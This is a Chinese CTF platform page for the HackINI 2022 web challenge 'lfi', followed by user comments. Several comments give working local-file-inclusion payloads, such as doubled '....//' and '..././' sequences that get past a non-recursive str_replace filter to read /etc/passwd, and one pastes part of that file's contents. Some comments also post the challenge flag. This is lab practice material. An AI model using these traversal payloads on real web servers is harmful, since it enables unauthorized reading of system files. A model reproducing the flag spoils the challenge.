lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 1339
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
hbesljx 10月前

直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../

回复 1

1005667204 11月前

使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd

回复 0

18993258097 11月前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 0

菜鸡的小韩 11月前

这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可

回复 0

ABC第一深情 1年前

/?language=/etc/passwd

回复 3

曦羽unT0x1ns 1年前

直接用file:///etc/passwd居然也行 oAo

回复 0
13657809271 8月前

我这样怎么不行

回复 0

XHTX 1年前

?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子

回复 0

868954104 1年前

?language=/languages/....//....//....//....//etc/passwd

回复 0

868954104 1年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 1

yituoshi 1年前

Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol

回复 0

WriteUp

image
a2cai

2 金币

评分(1)

解题动态

jie123 攻破了该题 1天前
cloud2water 攻破了该题 1天前
zero1999 攻破了该题 3天前
夏天的风 攻破了该题 7天前
攻破了该题 7天前
xinssr 攻破了该题 8天前
15239606841 攻破了该题 9天前
CTFHZN 攻破了该题 11天前
senxiang 攻破了该题 11天前
shangss 攻破了该题 11天前
戴白帽子的达瓦里希 攻破了该题 12天前
ddyy 攻破了该题 13天前
2269264191 攻破了该题 13天前
GnawKing 攻破了该题 14天前
LuoTianYi 攻破了该题 14天前
xkxtg 攻破了该题 14天前
18715507793 攻破了该题 14天前
kk190 攻破了该题 14天前
dongwanli 攻破了该题 14天前
1163064874 攻破了该题 15天前
问题反馈